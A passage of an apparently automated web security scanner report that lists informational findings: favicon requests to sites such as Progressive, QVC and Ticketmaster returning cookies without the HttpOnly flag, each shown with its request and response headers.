Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

..............h.......(....... .......................................................


..................................+++.333.666.888.<<<.JJJ.NNN.QQQ.RRR.TTT.UUU.VVV.WWW.XXX.aaa.jjj...........
...[SNIP]...
14.171. http://www.pricegrabber.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pricegrabber.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pricegrabber.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:28 GMT
Server: Apache/2.2
Set-Cookie: Apache=173.193.214.243.1301751568439706; path=/
Last-Modified: Thu, 30 Sep 2010 17:52:42 GMT
Accept-Ranges: bytes
Content-Length: 625
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR LAW ADM TAIi OUR DELi BUS PRE"
Content-Type: image/png

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..S;..Q.=...F.dnD...$.q.B.U.E....A..R...-,lE4U
..B..-DP...BX....I.g,&.nf..;.GDV.....>.......;....s.T.
.GD..t.6.e.......P
...[SNIP]...
14.172. http://www.progressive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.progressive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Content-Type: image/x-icon
Content-Location: http://www.progressive.com/favicon.ico
Last-Modified: Mon, 14 Jul 2008 17:26:23 GMT
Accept-Ranges: bytes
ETag: "90e7f8bcd6e5c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e2d8848e783d41c387116140aecf48e2; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:02 GMT
Content-Length: 10078

..............4...&...93.......$..Z...(........................................X#.Y".Z!.d2......................................u.Z".Z%.U"........*...............................Y%.X#.Y&.l:...........
...[SNIP]...
14.173. http://www.purdue.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.purdue.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:34 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 May 2009 18:19:03 GMT
ETag: "e802a-2fe-351f3c0"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: image/x-icon
Set-Cookie: BIGipServerPool_old-PPWC_all=1729800384.0.0000; path=/

...... ..............(... ...@................................................................................................................wwwwwwww.........................................3333333.
...[SNIP]...
14.174. http://www.qualityhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qualityhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 22 Nov 2008 02:06:45 GMT
ETag: "57e-45c3d9d14f740"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d961f070061ac0000; path=/; domain=www.qualityhealth.com

..............h.......(....... ........................................}g......mT.......p.K........lR..........v_..........w`......rY.......{......hN.....=.............................................
...[SNIP]...
14.175. http://www.qvc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qvc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qvc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Location: /favicon.ico?&cookie=set
Content-Length: 0
Expires: Sat, 02 Apr 2011 13:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:24 GMT
Connection: close
Set-Cookie: site=IIS; domain=.qvc.com; path=/; expires=04-Apr-2011 12:00:00 EST
Set-Cookie: dc=IIS; domain=.qvc.com; path=/
Set-Cookie: cae_browser=desktop; expires=Sat, 02-Apr-2011 15:36:24 GMT; path=/; domain=.qvc.com

14.176. http://www.qwest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:27 GMT
Server: Apache
Set-Cookie: TLTHID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Last-Modified: Mon, 30 Mar 2009 13:45:20 GMT
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

..............h.......(....... ...........@.........................................................t...............s...............6...........................A.......................................
...[SNIP]...
14.177. http://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.regions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402696235; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:21 GMT
Accept-Ranges: bytes
ETag: "16f4821a51a1cb1:83cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:32 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
14.178. http://www.reverbnation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n Phusion_Passenger/3.0.4
Last-Modified: Fri, 29 Jan 2010 15:02:18 GMT
ETag: "47e-47e4eebf39280"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:40:42 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerCust15535_http_new=3567336261.20480.0000; path=/

............ .h.......(....... ..... ........................................y...................................y...........................GN...../....................BB.....~......................
...[SNIP]...
14.179. http://www.righthealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.righthealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:00 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 30 Mar 2011 14:55:03 GMT
Accept-Ranges: bytes
Content-Length: 0
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:26:00 GMT
Content-Type: image/vnd.microsoft.icon
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sat, 02-Apr-2011 13:41:00 GMT;path=/

14.180. http://www.searchassist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchassist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchassist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=iso-8859-1
Server: Jetty(6.1.22)
Set-Cookie: AWSELB=2563B9B11EC8DD63A7D0066B27E680F281086BEFEBF9E88E0B9BA03C5D3EFB7E75B51AC65CF93C7D9695D6379942089DF4CAB7B8FAF475B2CC0D3E0F45F7C36B839009ECA9;MAX-AGE=60
Content-Length: 1376
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /favicon.ico. Reas
...[SNIP]...
14.181. http://www.sfgate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sfgate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:14 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751794799394; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Thu, 12 Aug 2004 16:20:01 GMT
ETag: "3e1a58-37e-3e17756a8640c"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Content-Type: image/x-icon

..............h.......(....... ...........@.........................................................................................................................33.33.33.33.33.33.33.33.33.33.33.33.
...[SNIP]...
14.182. http://www.sharebuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharebuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 120
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
HostName: A110
Date: Sat, 02 Apr 2011 13:43:01 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f">here</a>.</h2>
</body></html>
14.183. http://www.shoebuy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoebuy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 24 Sep 2008 05:15:33 GMT
ETag: "47e-5fa56740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:37 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKekAACDvAwsZAg==; path=/; expires=Thu, 31-Mar-16 13:51:37 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:37 GMT;path=/

............ .h.......(....... ..... ..............................................................................................................................}{..zw...............................
...[SNIP]...
14.184. http://www.shutterfly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:59 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2862-1172715710000"
Last-Modified: Thu, 01 Mar 2007 02:21:50 GMT
Content-Length: 2862
Set-Cookie: lb=0FEyVLc8-app224; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1802571948.20480.0000; path=/
Content-Type: text/plain

..............(...6...........h...^......... .h.......(....... ................................................................................................."......n.`.f`...........................
...[SNIP]...
14.185. http://www.snapfish.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfish.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.2.3
Vary: Accept-Encoding
Content-Length: 283
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServersf3-scw-pod2=1913336330.16415.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...
14.186. http://www.space.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.space.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.space.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:36 GMT
Last-Modified: Wed, 12 Jan 2011 18:34:49 GMT
ETag: "1ecab-e36-499aa74bee440"
Accept-Ranges: bytes
Content-Length: 3638
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSf4ec54=d0677b7b7d61b86ff3a6c5f1eca230d7971b76fb1a1987004d972dd8; Path=/

..............h...&... ..............(....... ...........@...................................>>>.^^^.....................MMM.qqq.........333.(((.........hhh.UUU.........EEE.yyy.....................##
...[SNIP]...
14.187. http://www.staples.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.staples.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staples.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:25:20 GMT
Connection: close
Set-Cookie: zipcode=20001; expires=Fri, 28-Mar-2031 13:25:20 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present

File not found
14.188. http://www.straighttalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.straighttalk.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straighttalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: STALKA=R360885800; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:41:09 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...
14.189. http://www.suite101.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suite101.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:42 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Last-Modified: Fri, 25 Jun 2010 21:13:03 GMT
ETag: "1f79678-47e-489e13c8775c0"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a6259:0; expires=Sat, 02-Apr-11 13:01:38 GMT; path=/

............ .h.......(....... ..... .........................................?...........9..C........*..{....+...............................V..'........O..d....U...(...    ...a.........................
...[SNIP]...
14.190. http://www.terra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.terra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:41 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753981.696717; path=/; expires=Fri, 01-Jan-2016 00:02:40 GMT; domain=.terra.com
Last-Modified: Tue, 05 Dec 2006 21:40:32 GMT
ETag: "1808f-14a6-423e250cc7400"
Accept-Ranges: bytes
Content-Length: 5286
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

..............h...6...........`....... ..............(....... ...........@.............................................................................................................................
...[SNIP]...
14.191. http://www.thefind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:08 GMT
Server: Apache
Set-Cookie: flsid=6c696ac09826ae214b6b34932fd74779; path=/
Expires: Sat, 02 Apr 2011 12:53:08 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:57 GMT
Set-Cookie: fl-uid=c4b368f36983c5eb4b2448a842ace642%2C1%2C1301748188; expires=Sun, 01-Apr-2012 12:43:08 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 1406
Content-Type: image/x-icon; charset=utf-8

..............h.......(....... ........................................................................................................................................................................
...[SNIP]...
14.192. http://www.theglobeandmail.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theglobeandmail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web4
Content-Length: 18520
Date: Sat, 02 Apr 2011 13:56:22 GMT
X-Varnish: 744761676 744759685
Age: 13
Via: 1.1 varnish
Connection: keep-alive
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

<!doctype html>
<html lang="en-ca" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime();</script>
<link rel="stylesheet" type="tex
...[SNIP]...
14.193. http://www.thehollywoodgossip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: mut=173.193.214.243.1301751604816322; path=/; expires=Sat, 30-Apr-11 13:40:04 GMT; domain=.thehollywoodgossip.com
Last-Modified: Thu, 21 Jan 2010 21:11:14 GMT
ETag: "4105de-cbe-47db324a12080"
Accept-Ranges: bytes
Content-Length: 3262
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:40:04 GMT
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...... ..............(... ...@...............................###..............................#)#......krgBQC......_fZ....................................###...............................&.......
...[SNIP]...
14.194. http://www.thinkquest.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thinkquest.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thinkquest.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0
ETag: "1f145c4-13e-4ce171f0"
Content-Type: image/x-icon
Last-Modified: Mon, 15 Nov 2010 17:46:24 GMT
Content-Length: 318
Date: Thu, 31 Mar 2011 10:40:06 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerwww_thinkquest_org_80=1562219149.15108.0000; expires=Sat, 02-Apr-2011 21:46:10 GMT; path=/

..............(.......(....... .......................................??..__..............//..........OO.....................................}....{............=;..... ..-...................d....m...
...[SNIP]...
14.195. http://www.ticketmaster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketmaster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=nD7GlUEnkxIP7ANtKRu_CqupVk7ohnaWjtsXe2PfX3lEBQ0y0XLy9mY0z8iGhhi7LrunY3_V4W0yuO2C; path=/; domain=.ticketmaster.com
